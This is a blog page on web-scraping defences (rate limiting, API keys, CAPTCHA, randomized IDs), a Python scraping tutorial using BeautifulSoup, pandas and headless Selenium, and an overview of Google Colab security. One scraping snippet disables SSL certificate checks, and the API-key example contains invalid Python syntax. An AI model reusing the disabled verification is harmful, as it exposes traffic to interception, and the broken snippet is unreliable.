QeeqBox

Category: Data Security

Web Scraping Prevention
Web Scraping Prevention Techniques

Many websites prohibit web scraping and use anti-scraping measures to block automated data extraction. These protections can make it challenging and time-consuming to scale scraping activities. For instance, if a script sends requests too frequently (like once every second), the website may block those requests or display a message asking the user to slow down or try again later.

Fingerprinting

Fingerprinting is a technique used to identify and track clients based on detailed technical information such as IP addresses, user-agent strings, browser versions, operating systems, screen resolutions, installed fonts, and even hardware characteristics. By combining these signals, websites can create a unique “fingerprint” for each visitor. If multiple requests appear to originate from the same fingerprint in an automated pattern, the system can flag or block them, even if the IP address changes.

Example

from http.server import BaseHTTPRequestHandler, HTTPServer # import base classes for HTTP server
from time import time # import time function for request timing
requests = {} # dictionary to store request history per fingerprint

class CustomHandler(BaseHTTPRequestHandler): # define request handler class
def do_GET(self): # handle GET requests
now = time() # current timestamp
ip = self.client_address[0] # get client IP address
user_agent = self.headers.get(“User-Agent”, “”) # browser info
accept_lang = self.headers.get(“Accept-Language”, “”) # language preference
encoding = self.headers.get(“Accept-Encoding”, “”) # compression support
fingerprint = f”{ip}{user_agent}|{accept_lang}|{encoding}” # create a simple fingerprint using IP + headers
requests[fingerprint] = [t for t in requests.get(fingerprint, []) if now – t < 10] # keep only requests from last 10 seconds for this fingerprint
requests[fingerprint].append(now) # log current request time

if len(requests[fingerprint]) > 5: # if too many requests in time window, block client
self.send_response(429) # HTTP status: Too Many Requests
self.send_header(‘Content-type’, ‘text/plain’) # response type
self.end_headers() # finish HTTP headers
self.wfile.write(f”Fingerprint:{fingerprint} – Too many requests…”.encode(“utf-8”)) # send blocked message with fingerprint info
else:
self.send_response(200) # HTTP OK
self.send_header(‘Content-type’, ‘text/plain’) # response type
self.end_headers() # finish headers
self.wfile.write(f”Fingerprint:{fingerprint} – Server Running…”.encode(“utf-8”)) # send normal response with fingerprint info

return # end request handling

HTTPServer((“”, 8085), CustomHandler).serve_forever() # start server on port 8080 and run forever
```
from http.server import BaseHTTPRequestHandler, HTTPServer
from time import time
requests = {}

class CustomHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        now = time()
        ip = self.client_address[0]
        user_agent = self.headers.get("User-Agent", "")
        accept_lang = self.headers.get("Accept-Language", "")
        encoding = self.headers.get("Accept-Encoding", "")
        fingerprint = f"{ip}{user_agent}|{accept_lang}|{encoding}"
        requests[fingerprint] = [t for t in requests.get(fingerprint, []) if now - t < 10]
        requests[fingerprint].append(now)

        if len(requests[fingerprint]) > 5:
            self.send_response(429)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(f"Fingerprint:{fingerprint} - Too many requests...".encode("utf-8"))
        else:
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(f"Fingerprint:{fingerprint} - Server Running...".encode("utf-8"))

        return

HTTPServer(("", 8080), CustomHandler).serve_forever()
```
Authentication

Authentication systems require users to verify their identity before accessing content. This is often achieved through login pages, API keys, or session tokens. By requiring users to authenticate, websites can better control who accesses their data and monitor usage per account. This also allows them to enforce limits on a per-user basis rather than per IP address, making scraping more challenging.

Example

from http.server import BaseHTTPRequestHandler, HTTPServer # import basic HTTP server classes
api_keys = {“Example-6C324086-6B3B-48D5-9FEE-4A30C66B70CC”:[“ip”:””,”user”,””]} # dictionary storing valid API keys and optional metadata (invalid Python dict syntax for nested list here)

class CustomHandler(BaseHTTPRequestHandler): # define request handler class
def do_GET(self): # handle GET requests
api_key = self.headers.get(“X-API-Key”, “”) # extract API key from request headers
if api_key not in api_keys: # check if API key is invalid or missing
self.send_response(401) # return HTTP 401 Unauthorized
self.send_header(‘Content-type’, ‘text/plain’) # set response content type
self.end_headers() # finish HTTP headers
self.wfile.write(b”Authentication required”) # send authentication error message
else: # if API key is valid
self.send_response(200) # return HTTP 200 OK
self.send_header(‘Content-type’, ‘text/plain’) # set response content type
self.end_headers() # finish HTTP headers
self.wfile.write(b”Server Running…”) # send success response message
return # end request handling

HTTPServer((“”, 8080), CustomHandler).serve_forever() # start server on port 8080 and run forever
```
from http.server import BaseHTTPRequestHandler, HTTPServer
api_keys = {"Example-6C324086-6B3B-48D5-9FEE-4A30C66B70CC":["ip":"","user",""]}

class CustomHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        api_key = self.headers.get("X-API-Key", "")
        if api_key not in api_keys:
            self.send_response(401)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(b"Authentication required")
        else:
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(b"Server Running...")
        return

HTTPServer(("", 8080), CustomHandler).serve_forever()
```
Challenges (CAPTCHA)

CAPTCHA tests are designed to differentiate humans from bots. They may involve identifying distorted text, selecting images, solving puzzles, or performing simple interactive tasks. Since most automated scripts struggle with these challenges, CAPTCHA serves as an effective barrier to prevent large-scale scraping or automated form submissions.

Example

from http.server import BaseHTTPRequestHandler, HTTPServer # HTTP server framework
from random import randint # generate random numbers for CAPTCHA
from uuid import uuid4 # generate unique session ID for each CAPTCHA
captcha_db = {} # store captcha_id -> correct answer mapping

class Handler(BaseHTTPRequestHandler): # request handler class
def do_GET(self): # handle GET requests (show CAPTCHA page)
random_a = randint(1, 10) # first random number
random_b = randint(1, 10) # second random number
captcha_id = str(uuid4()) # create unique ID for this CAPTCHA session
captcha_db[captcha_id] = str(random_a + random_b) # store correct answer on server
self.send_response(200) # HTTP 200 OK
self.send_header(“Content-type”, “text/html”) # response is HTML page
self.end_headers() # finish headers
# send HTML form to user
self.wfile.write(f”””
<html>
<body>
<h3>CAPTCHA: What is {random_a} + {random_b}?</h3>
<form method=”POST”>
<input name=”answer” type=”text”>
<input type=”hidden” name=”captcha_id” value=”{captcha_id}”>
<input type=”submit” value=”Submit”>
</form>

</body>
</html>
“””.encode())

def do_POST(self): # handle form submission
length = int(self.headers.get(‘Content-Length’)) # get size of request body
data = self.rfile.read(length).decode() # read and decode form data
fields = dict(x.split(“=”) for x in data.split(“&”)) # parse form fields
user_answer = fields.get(“answer”, “”) # user submitted answer
captcha_id = fields.get(“captcha_id”, “”) # session id from form
correct_answer = captcha_db.get(captcha_id, “”) # get stored correct answer
self.send_response(200) # HTTP OK
self.send_header(“Content-type”, “text/plain”) # plain text response
self.end_headers() # finish headers
if user_answer == correct_answer: # check if answer is correct
self.wfile.write(b”CAPTCHA passed”) # success message
else:
self.wfile.write(b”CAPTCHA failed”) # failure message

del captcha_db[captcha_id] # remove CAPTCHA after attempt (single-use)

HTTPServer((“”, 8080), Handler).serve_forever() # start server on port 8080
```
from http.server import BaseHTTPRequestHandler, HTTPServer
from random import randint
from uuid import uuid4
captcha_db = {}

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        random_a = randint(1, 10)
        random_b = randint(1, 10)
        captcha_id = str(uuid4())
        captcha_db[captcha_id] = str(random_a + random_b)
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
       
        self.wfile.write(f"""
        <html>
        <body>
            <h3>CAPTCHA: What is {random_a} + {random_b}?</h3>
            <form method="POST">
                <input name="answer" type="text">
                <input type="hidden" name="captcha_id" value="{captcha_id}">
                <input type="submit" value="Submit">
            </form>

        </body>
        </html>
        """.encode())

    def do_POST(self):
        length = int(self.headers.get('Content-Length'))
        data = self.rfile.read(length).decode()
        fields = dict(x.split("=") for x in data.split("&"))
        user_answer = fields.get("answer", "")
        captcha_id = fields.get("captcha_id", "")
        correct_answer = captcha_db.get(captcha_id, "")
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.end_headers()
        if user_answer == correct_answer:
            self.wfile.write(b"CAPTCHA passed")
        else:
            self.wfile.write(b"CAPTCHA failed")

        del captcha_db[captcha_id]

HTTPServer(("", 8080), Handler).serve_forever()
```
Dynamic Content

Dynamic content is generated at runtime rather than being fixed in the HTML source. This often involves JavaScript rendering, API calls, or asynchronous data loading. Since the content is not directly present in the initial page source, simple HTML-only scraping tools cannot easily extract the data without simulating a real browser environment.

from http.server import BaseHTTPRequestHandler, HTTPServer # HTTP server framework
from datetime import datetime # used to generate dynamic runtime timestamp

class CustomHandler(BaseHTTPRequestHandler): # request handler class
def do_GET(self): # handle GET requests
if self.path == “/”: # main webpage route
self.send_response(200) # HTTP 200 OK
self.send_header(‘Content-type’, ‘text/html’) # response is HTML page
self.end_headers() # finish headers
self.wfile.write(b”””
<html>
<body>
<h1>Server Running…</h1>
<div id=”data”>Loading…</div>
<script>
setTimeout(() => { // wait 10 seconds before loading data
fetch(“/data”) // request dynamic backend endpoint
.then(r => r.text()) // convert response to text
.then(t => document.getElementById(“data”).innerText = t); // update page content
}, 10000); // 10000ms delay (10 seconds)
</script>
</body>
</html>
“””)
return # stop processing this request

if self.path == “/data”: # dynamic data endpoint
self.send_response(200) # HTTP OK
self.send_header(‘Content-type’, ‘text/plain’) # plain text response
self.end_headers() # finish headers
self.wfile.write(f”Dynamic Content Loaded: {datetime.now().strftime(“%m-%d-%Y %I:%M %p”)}”.encode()) # write the dynamic content
return # end request

HTTPServer((“”, 8080), CustomHandler).serve_forever() # start server on port 8080
```
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime

class CustomHandler(BaseHTTPRequestHandler):# request handler class
    def do_GET(self):
        if self.path == "/":
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            self.wfile.write(b"""
            <html>
            <body>
                <h1>Server Running...</h1>
                <div id="data">Loading...</div>
                <script>
                    setTimeout(() => { // wait 10 seconds before loading data
                        fetch("/data") // request dynamic backend endpoint
                        .then(r => r.text()) // convert response to text
                        .then(t => document.getElementById("data").innerText = t); // update page content
                    }, 10000);// 10000ms delay (10 seconds)
                </script>
            </body>
            </html>
            """)
            return

        if self.path == "/data":
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(f"Dynamic Content Loaded: {datetime.now().strftime("%m-%d-%Y %I:%M %p")}".encode())
            return

HTTPServer(("", 8080), CustomHandler).serve_forever()
```
Randomized Identifiers

Websites often change element IDs, class names, or API endpoints dynamically. This prevents scrapers from relying on fixed selectors to locate data. For instance, a product price element might have a different ID each time the page loads. This forces scrapers to constantly adapt and makes automation less reliable.

from http.server import BaseHTTPRequestHandler, HTTPServer # import HTTP server classes
from random import randint # used to generate random IDs

class CustomHandler(BaseHTTPRequestHandler): # define request handler
def do_GET(self): # handle GET requests
self.send_response(200) # send HTTP 200 OK status
self.send_header(‘Content-type’, ‘text/html’) # response is HTML
self.end_headers() # finish headers
random_id = f”id_{randint(1000,9999)}” # generate random element ID each request
# send HTML response to client
self.wfile.write(f”””
<html>
<body>
<div id=”{random_id}”>Gas Price is: $5.99 per gallon</div>
</body>
</html>
“””.encode())

HTTPServer((“”, 8080), CustomHandler).serve_forever() # start server on port 8080
```
from http.server import BaseHTTPRequestHandler, HTTPServer
from random import randint 

class CustomHandler(BaseHTTPRequestHandler): 
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html') 
        self.end_headers()
        random_id = f"id_{randint(1000,9999)}"
        self.wfile.write(f"""
        <html>
            <body>
                <div id="{random_id}">Gas Price is: $5.99 per gallon</div>
            </body>
        </html>
        """.encode()) 

HTTPServer(("", 8080), CustomHandler).serve_forever()
```
User Behavior Analysis

User Behavior Analysis technique focuses on analyzing how users interact with a website over time. Typical human behavior includes pauses, scrolling, clicks, and irregular timing, while bots tend to generate consistent, fast, and repetitive request patterns. Websites use machine learning or rule-based systems to detect anomalies, such as extremely fast navigation, identical click paths, or repetitive page access patterns, and subsequently restrict or block suspicious activity.

Honeypots

Honeypots are hidden elements embedded in a webpage that are either invisible or irrelevant to normal users (such as hidden links or form fields). Bots that blindly follow all available elements may end up interacting with these traps. Once triggered, the system can flag the behavior as automated and take action such as blocking the IP address, logging the activity, or redirecting the user.
April 28, 2026
Web Scraping
Data Scraping

Data scraping is the process of extracting information from a target source and saving it into a file for further use. This target could be a website, an application, or any digital platform containing structured or unstructured data. The main goal of data scraping is to collect large amounts of data efficiently without manual copying, making it easier for organizations or individuals to gather the information they need for analysis or reporting.

The process often involves using automated tools or scripts, such as web crawlers, bots, or specialized scraping frameworks. These tools navigate the target source, locate the desired data, and extract it in a structured format such as CSV, JSON, or Excel. Depending on the source, data scraping may require overcoming challenges such as dynamic content, login requirements, or anti-bot measures. It is a technical process that requires careful handling to ensure accuracy and efficiency.

While data scraping focuses on data collection, the extracted information is often analyzed in a subsequent process called data mining. For example, a web crawler may scrape product details, prices, and reviews from e-commerce websites, and the collected data can then be analyzed to identify trends, patterns, or insights. By separating extraction from analysis, organizations can efficiently manage raw data and transform it into actionable intelligence, making data scraping a crucial first step in many data-driven workflows.

Web Scraping

Web Scraping is the automated process of extracting data from websites by using software tools or scripts to collect information directly from web pages. Websites can contain either static content, which is fixed in the page’s HTML and generally easier to scrape, or dynamic content, which is generated using JavaScript and may require more advanced tools or browser automation to access. Web scraping is commonly used for data collection, research, price monitoring, market analysis, and cybersecurity investigations. However, it is important to follow ethical and legal guidelines when scraping data, including reviewing the website’s terms of service and robots.txt file to ensure that scraping is permitted, as unauthorized data extraction may violate policies or laws.

Manual Web Scraping

The process of extracting data from webpages without using any scraping tools or features is convenient for very small amounts of content. Still, it becomes very complicated if the data is large or needs to be scraped more often. One of the great benefits of manual scraping is human review; every data point is checked by the person who scrapes it.

Manual Web Scraping (Example #1)

Getting all the URLs from this wiki page

Right click of the page and choose View Page Source

Search the page for the href html tags (This tag defines a hyperlink), click on Highlight All and copy them one by one, this will take very long time, what you can do is taking the content and paste it into a text editor, and use href=["'](?<link>.*?)['"] or (?<=href=")[^"]* regex

Save them into a file
```
href="/w/load.php?lang=en&amp;modules=codex-search-styles%7Cext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=ext.gadget.SubtleUpdatemarker%2CWatchlistGreenIndicators&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector-2022"
href="//upload.wikimedia.org"
href="//en.m.wikipedia.org/wiki/Malware"
href="/w/index.php?title=Malware&amp;action=edit"
href="/static/apple-touch/wikipedia.png"
href="/static/favicon/wikipedia.ico"
href="/w/opensearch_desc.php"
href="//en.wikipedia.org/w/api.php?action=rsd"
href="https://en.wikipedia.org/wiki/Malware"
href="https://creativecommons.org/licenses/by-sa/4.0/deed.en"
href="/w/index.php?title=Special:RecentChanges&amp;feed=atom"
href="//meta.wikimedia.org"
href="//login.wikimedia.org"
...
...
...
```
Automated Web Scraping

This is done by utilizing tools that get the content and save it into files; Python has been heavily utilized for web scraping. There are different Python modules like beautifulsoup or pandas that are used for both scraping and mining.

Automated Web Scraping (Example #1)

The beautifulsoup module is good for getting all the URLs from a webpage, this method of scraping is limited, it works great with static content, but you cannot get dynamic content or a screenshot of the website using this method

Install beautifulsoup4 and lxml using the pip command

from bs4 import BeautifulSoup # Import BeautifulSoup for HTML parsing
from requests import get # Import get() to send HTTP requests
headers = {“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36”} # Mimic a real browser
response = get(“https://en.wikipedia.org/wiki/Main_Page”, headers=headers) # Send GET request with defied header
print(response.status_code) # Print HTTP status code (200 = OK)
soup = BeautifulSoup(response.text, ‘html.parser’) # Parse HTML content
for item in soup.find_all(href=True): # Loop through all tags containing an href attribute
print(item[‘href’]) # Print the link URL
```
from bs4 import BeautifulSoup
from requests import get
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"}
response = get("https://en.wikipedia.org/wiki/Main_Page", headers=headers)
print(response.status_code)
soup = BeautifulSoup(response.text, 'html.parser')
for item in soup.find_all(href=True):
    print(item['href'])
```
Output
```
href="/w/load.php?lang=en&amp;modules=codex-search-styles%7Cext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=ext.gadget.SubtleUpdatemarker%2CWatchlistGreenIndicators&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector-2022"
href="//upload.wikimedia.org"
href="//en.m.wikipedia.org/wiki/Malware"
href="/w/index.php?title=Malware&amp;action=edit"
href="/static/apple-touch/wikipedia.png"
href="/static/favicon/wikipedia.ico"
href="/w/opensearch_desc.php"
href="//en.wikipedia.org/w/api.php?action=rsd"
href="https://en.wikipedia.org/wiki/Malware"
href="https://creativecommons.org/licenses/by-sa/4.0/deed.en"
href="/w/index.php?title=Special:RecentChanges&amp;feed=atom"
href="//meta.wikimedia.org"
href="//login.wikimedia.org"
...
...
...
```
Automated Web Scraping (Example #2)

The pandas module is good for getting all tables within a page, similar to the previous example, this method of scraping is limited, it works great with static content, but you cannot get dynamic content or a screenshot of the website using this method

Install pandas and lxml using the pip command

# bash /Applications/Python*/Install\ Certificates.command # macOS command to install SSL certificates if needed
import pandas as pd # Import pandas for data handling and HTML table parsing
import ssl # Import SSL module to handle HTTPS settings
ssl._create_default_https_context = ssl._create_unverified_context # Disable SSL certificate verification (useful when encountering certificate errors)
tables = pd.read_html(“https://goblackbears.com/sports/baseball/stats”) # Read all HTML tables from the given URL into a list of DataFrames
for i, table in enumerate(tables): # Loop through each table with its index
print(“Table %s\n” % i, table.head()) # Print table index and first 5 rows
```
import pandas as pd
tables = pd.read_html("https://goblackbears.com/sports/baseball/stats")
for i, table in enumerate(tables):
    print("Table %s\n" % i,table.head())
```
Output
```
Table 0
     0                                                  1
0 NaN  This article has multiple issues. Please help ...
1 NaN  This article needs to be updated. Please help ...
2 NaN  This article needs additional citations for ve...
Table 1
     0                                                  1
0 NaN  This article needs to be updated. Please help ...
Table 2
     0                                                  1
0 NaN  This article needs additional citations for ve...
Table 3
      Virus  ...                                              Notes
0     1260  ...   First virus family to use polymorphic encryption
1       4K  ...  The first known MS-DOS-file-infector to use st...
2      5lo  ...                            Infects .EXE files only
3  Abraxas  ...  Infects COM file. Disk directory listing will ...
4     Acid  ...  Infects COM file. Disk directory listing will ...

[5 rows x 9 columns]
Table 4
      vteMalware topics                                vteMalware topics.1
0   Infectious malware  Comparison of computer viruses Computer virus ...
1          Concealment  Backdoor Clickjacking Man-in-the-browser Man-i...
2   Malware for profit  Adware Botnet Crimeware Fleeceware Form grabbi...
3  By operating system  Android malware Classic Mac OS viruses iOS mal...
4           Protection  Anti-keylogger Antivirus software Browser secu...
```
Automated Web Scraping (Example #3)

One of the best web scraping techniques is using a headless browser, which means running a browser that runs without a graphical user interface (GUI). This was originally used for automated quality assurance tests but has recently been used for scraping. The main two benefits of using the headless browser is rendering dynamic content and behaving like a human browsing a website.

The following scripts will not run on Google Colab

Scrape using Firefox (with geckodriver setup)
1. Install the latest Firefox version
2. Install selenium using the pip command
3. Download the geckodriver from here (The Firefox application version has to match the webdriver version)
4. Extract the geckodriver and note the location (E.g., /scrape/geckodriver)
from selenium import webdriver # Import Selenium WebDriver
options = webdriver.firefox.options.Options() # Create Firefox options object
options.add_argument(“–headless”) # Run Firefox in headless mode (no GUI)
service = webdriver.firefox.service.Service(r’path to the geckodriver’) # Specify the local path to geckodriver executable
browser = webdriver.Firefox(options=options, service=service) # Launch Firefox with the specified options
browser.get(‘https://www.google.com’) # Open Google homepage
# print(browser.find_element(By.XPATH, “/html/body”).text) # (Optional) Print the full page text
browser.save_screenshot(“screenshot_using_firefox.png”) # Save a screenshot of the loaded page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
options = webdriver.firefox.options.Options()
options.add_argument("--headless")
service = webdriver.firefox.service.Service(r'path to the geckodriver')
browser = webdriver.Firefox(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_firefox.png")
browser.close()
browser.quit()
```
Scrape using Firefox (without geckodriver setup)
1. Install the latest Firefox version
2. Install selenium and webdriver-manager using the pip command
from selenium import webdriver # Import Selenium WebDriver
from webdriver_manager.firefox import GeckoDriverManager # Automatically download/manage GeckoDriver
options = webdriver.firefox.options.Options() # Create Firefox options object
options.add_argument(“–headless”) # Run Firefox in headless (no GUI) mode
service = webdriver.firefox.service.Service(GeckoDriverManager().install()) # Set up GeckoDriver service
browser = webdriver.Firefox(options=options, service=service) # Launch Firefox with specified options
browser.get(‘https://www.google.com’) # Open Google homepage
# print(browser.find_element(By.XPATH, “/html/body”).text) # (Optional) Print full page text
browser.save_screenshot(“screenshot_using_firefox.png”) # Capture a screenshot of the page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
from webdriver_manager.firefox import GeckoDriverManager
options = webdriver.firefox.options.Options()
options.add_argument("--headless")
service = webdriver.firefox.service.Service(GeckoDriverManager().install())
browser = webdriver.Firefox(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_firefox.png")
browser.close()
browser.quit()
```
Scrape using Chrome (with chromedriver setup)
1. Install the latest Chrome version
2. Install selenium using the pip command
3. Download the ChromeDriver from here (The chrome web browser version has to match the webdriver version)
4. Extract the ChromeDriver and note the location (E.g., /scrape/chromedriver)
from selenium import webdriver # Import Selenium WebDriver
options = webdriver.chrome.options.Options() # Create Chrome options object
options.add_argument(‘–headless’) # Run Chrome in headless (no GUI) mode
options.add_argument(‘–no-sandbox’) # Disable sandbox (required in containers/VMs)
options.add_argument(‘–disable-dev-shm-usage’) # Prevent shared memory issues
service = webdriver.chrome.service.Service(r’path to the chromedriver’) # Specify the local path to chromedriver
browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with specified options
browser.get(‘https://www.google.com’) # Open Google homepage
browser.save_screenshot(“screenshot_using_chrome.png”) # Take a screenshot of the loaded page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
options = webdriver.chrome.options.Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
service = webdriver.chrome.service.Service(r'path to the chromedriver')
browser = webdriver.Chrome(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_chrome.png")
browser.close()
browser.quit()
```
Scrape using Chrome (without chromedriver setup)
1. Install the latest Chrome version
2. Install selenium and webdriver-manager using the pip command
from selenium import webdriver # Import Selenium WebDriver
from webdriver_manager.chrome import ChromeDriverManager # Automatically download/manage ChromeDriver
options = webdriver.chrome.options.Options() # Create Chrome options object
options.add_argument(‘–headless’) # Run Chrome in headless (no GUI) mode
options.add_argument(‘–no-sandbox’) # Disable sandbox (required in some environments)
options.add_argument(‘–disable-dev-shm-usage’) # Avoid shared memory issues in containers
service = webdriver.chrome.service.Service(ChromeDriverManager().install()) # Set up ChromeDriver service
browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with specified options
browser.get(‘https://www.google.com’) # Open Google homepage
browser.save_screenshot(“screenshot_using_chrome.png”) # Capture a screenshot of the page
browser.close() # Close the browser
browser.quit()
```
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
options = webdriver.chrome.options.Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
service = webdriver.chrome.service.Service(ChromeDriverManager().install())
browser = webdriver.Chrome(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_chrome.png")
browser.close()
browser.quit()
```
Automated Web Scraping (Example #4 – Best Option)

You can run this one in google colab

Install latest chrome version

!apt update # Update the package list from repositories
!apt install libu2f-udev libvulkan1 # Install dependencies required by Google Chrome
!wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb # Download the Google Chrome .deb package
!dpkg -i google-chrome-stable_current_amd64.deb # Install the Chrome package manually
!apt –fix-broken install # Fix missing dependencies caused by dpkg install
!pip install selenium webdriver-manager # Install Selenium and Chrome driver manager via pip
```
!apt update
!apt install libu2f-udev libvulkan1
!wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
!dpkg -i google-chrome-stable_current_amd64.deb
!apt --fix-broken install 
!pip install selenium webdriver-manager
```
Scrape the website

from selenium import webdriver # Import Selenium WebDriver
from webdriver_manager.chrome import ChromeDriverManager # Automatically manage ChromeDriver
from selenium.webdriver.common.by import By # Import locator strategies (e.g., XPATH)
options = webdriver.chrome.options.Options() # Create Chrome options object
options.add_argument(‘–headless’) # Run Chrome without a visible window
options.add_argument(‘–no-sandbox’) # Disable sandbox (needed in containers/Colab)
options.add_argument(‘–disable-dev-shm-usage’) # Prevent shared memory issues
service = webdriver.chrome.service.Service(ChromeDriverManager().install()) # Install and configure ChromeDriver service
browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with defined options
browser.get(‘https://www.google.com’) # Open Google homepage
# print(browser.find_element(By.XPATH, “/html/body”).text) # (Optional) Print page text using XPath
browser.save_screenshot(“screenshot_using_chrome.png”) # Save a screenshot of the loaded page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By 
options = webdriver.chrome.options.Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
service = webdriver.chrome.service.Service(ChromeDriverManager().install())
browser = webdriver.Chrome(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_chrome.png")
browser.close()
browser.quit()
```
If you want to wait until a website loads, you can use the sleep function

from selenium import webdriver # Import Selenium WebDriver
from webdriver_manager.chrome import ChromeDriverManager # Automatically manage ChromeDriver
from selenium.webdriver.common.by import By # Import locator strategies (e.g., XPATH)
from time import sleep # Import sleep function
options = webdriver.chrome.options.Options() # Create Chrome options object
options.add_argument(‘–headless’) # Run Chrome without a visible window
options.add_argument(‘–no-sandbox’) # Disable sandbox (needed in containers/Colab)
options.add_argument(‘–disable-dev-shm-usage’) # Prevent shared memory issues
service = webdriver.chrome.service.Service(ChromeDriverManager().install()) # Install and configure ChromeDriver service
browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with defined options
browser.get(‘https://us.shop.battle.net/en-us’) # Open battle homepage
sleep(10) # Wait 10 seconds
# print(browser.find_element(By.XPATH, “/html/body”).text) # (Optional) Print page text using XPath
browser.save_screenshot(“screenshot_using_chrome.png”) # Save a screenshot of the loaded page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By 
from time import sleep
options = webdriver.chrome.options.Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
service = webdriver.chrome.service.Service(ChromeDriverManager().install())
browser = webdriver.Chrome(options=options, service=service)
browser.get('https://us.shop.battle.net/en-us')
sleep(10)
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_chrome.png")
browser.close()
browser.quit()
```
April 5, 2026
Google Colab
Google Colab

Google Colab (Colaboratory) is a cloud-based, hosted Jupyter Notebook environment provided by Google. It allows users to write and run Python code in a web browser without installing any software locally. Colab is particularly popular for data science, machine learning, and deep learning projects due to its easy access to computing resources, including CPUs, GPUs, and TPUs.

Colab is available in two main tiers:
- Free version: Designed primarily for learning, experimentation, and lightweight projects. Users get access to a basic virtual machine with limited RAM and CPU/GPU resources. Sessions in the free tier have time limits, and resources are allocated dynamically, so performance may vary.
- Paid versions: Targeted at professional or heavy users who need more consistent performance. Paid subscriptions provide faster GPUs, larger RAM allocations, longer runtimes, and priority access to resources, making them suitable for more demanding tasks such as training large machine learning models.
Key features of Google Colab include:
- Interactive coding: Run code cells, visualize outputs, and modify computations in real-time.
- Seamless integration with Google Drive: Save notebooks directly in Drive for easy access and sharing.
- Pre-installed libraries: Popular Python libraries for data analysis, machine learning, and visualization (e.g., NumPy, pandas, Matplotlib, TensorFlow, PyTorch) are already installed.
- Collaboration: Multiple users can work on the same notebook simultaneously, similar to Google Docs.
- Hardware acceleration: Easily switch between CPU, GPU, and TPU for faster computations without complex setup.
Overall, Google Colab provides a flexible, accessible, and collaborative environment for learning, experimentation, and professional projects, making advanced computational resources available to anyone with an internet connection.

You can access the free tier of Google Colab by signing in with your Google account at the following link https://colab.research.google.com/drive/

Colab Security

The security of Google Colab is tied to your Google Account. For example, if you enable two-factor authentication and carefully manage sharing permissions, your notebooks and data remain protected. However, if your account is compromised or you share notebooks with broad access, others may be able to view or modify your work.

Google Colab Cyberattacks
- Phishing Attack
  - A threat actor sends a phishing email impersonating Google, prompting the recipient to log in to Colab via a fake link.
  - Impact:
    
    If the person falls for it, the threat actor can access their Google Account
    
    The Colab notebooks, Drive files, and connected data are exposed
  - Preventive Measures :
    
    Verify URLs before logging in
    
    Enable two-factor authentication (2FA)
    
    Never enter credentials on suspicious sites
- Credential Stuffing
  - A threat actor uses leaked passwords from other services to attempt to log into someone’s Google Account.
  - Impact:
    
    If the password is reused, the threat actor gains access to Colab notebooks
    
    They can view sensitive datasets, copy or delete notebooks, or run malicious code
  - Preventive Measures:
    
    Use strong, unique passwords for Google Accounts
    
    Enable 2FA
    
